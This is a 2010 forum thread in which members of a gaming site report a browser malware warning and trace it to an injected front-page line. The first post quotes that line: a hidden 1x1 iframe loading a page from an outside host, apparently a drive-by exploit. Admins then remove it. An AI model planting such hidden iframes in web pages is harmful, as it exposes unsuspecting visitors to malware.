Jump to content


Photo

[Resolved] Malware warning on GHZ?


  • Please log in to reply
10 replies to this topic

#1 qazimod

qazimod

  • Founding Member
  • 2,458 posts
  • Steam Profile

Posted 31 December 2010 - 11:16 AM

Not sure if this is a known issue; just got the attached warning from Google Chrome when visiting GHZ.

Attached File  ghzmal.jpg   123.99KB   7 downloads

It seems to only appear on the index though... unsure.gif I think it has a beef with this code at the top:

CODE
<iframe src='http://hh7c.cz.cc/index.php?tp=cd15c7b47e6ff6b2' width='1' height='1' frameborder='0'></iframe><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>


It could be nothing though, so sorry if I'm rambling about nonsense.

EDIT: oh, and clicking my attachment may bring up the warning before you can view the image. tongue.gif

Edited by qazimod, 01 January 2011 - 10:32 AM.


#2 hankwang

hankwang

    please stop typing William

  • Founding Member
  • 8,666 posts

Posted 31 December 2010 - 12:58 PM

Cheers Qazi, we're looking into it.

As you've already noticed, going straight to /forums/ gives you no problems although that's not going to help anyone already reading this UNGGGHARGH.gif

#3 E. Randy Dupre

E. Randy Dupre

    Just as you suspected, everything I have told you is gibberish

  • Admin
  • 8,859 posts
  • Steam Profile

Posted 31 December 2010 - 01:26 PM

hank, Firefox is giving me a 'reported attack site' warning on every single page of the site, not just the index, making it impossible to post. Posting this with IE, which doesn't seem to have any issues.

At the moment, anyway. When qazi started the thread, Firefox was still perfectly happy with the board. Not sure what's happened in the meantime.

#4 hankwang

hankwang

    please stop typing William

  • Founding Member
  • 8,666 posts

Posted 31 December 2010 - 02:10 PM

Yeah, that's just come up for me too. Probably just a roll on from the front page though, I don't think there's any infection or injection on the board itself.

Will's checking the main page source now.

#5 Willei

Willei

    This is what I think of games

  • Founding Member
  • 2,299 posts

Posted 31 December 2010 - 03:32 PM

The forum pages themselves look fine to me. No external scripts or anything added as far as I can tell. The only thing is the front page which needs removing, which is mostly static IIRC.

It's not worth discussing any more in public for obvious reasons. Anyone who wants to talk about it can get me MSN, as I don't have access to edit anything here myself. The iframe added on the front page seems to be a Java applet of some kind, so if you've visited via the front page and have a version of JRE installed which isn't the very latest one I'd recommend you perform a full virus scan.

#6 Singho

Singho

    U CAN'T SEE MEEE!

  • Admin
  • 11,144 posts

Posted 31 December 2010 - 05:04 PM

IT'S THE WILLENIUM BUG

#7 Adrock

Adrock
  • Admin
  • 2,810 posts

Posted 31 December 2010 - 05:42 PM

Seems somebody put an iframe on the front page.

Been removed now, that should fix it.

#8 Adrock

Adrock
  • Admin
  • 2,810 posts

Posted 01 January 2011 - 09:15 AM

Sorted! Reports of malware/badware should all have stopped.

Sorry for the inconvenience guys.

#9 Singho

Singho

    U CAN'T SEE MEEE!

  • Admin
  • 11,144 posts

Posted 01 January 2011 - 12:03 PM

Whats an iframe?

#10 Adrock

Adrock
  • Admin
  • 2,810 posts

Posted 01 January 2011 - 12:13 PM

Afaik its a tag that allows another page or document to be loaded within a page. So basically it was directing to a nefarious javascript that caused grief with anyone unlucky enough to get caught by it.

#11 SniperDave

SniperDave

    The Pokémon Prof

  • Founding Member
  • 3,901 posts

Posted 01 January 2011 - 04:18 PM

QUOTE(Adrock @ Jan 1 2011, 12:13 PM) <{POST_SNAPBACK}>
Afaik its a tag that allows another page or document to be loaded within a page.


Yes, for example Youtube has an option to embed a video using an iframe rather than as an object. It uses a lot less script this way since its essentially just a link to their website rather than an object being built on the page with links back to the content on their site. It also lets you embed the HTML version of the player rather than the Flash version, which is good for mobile device compatibility.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users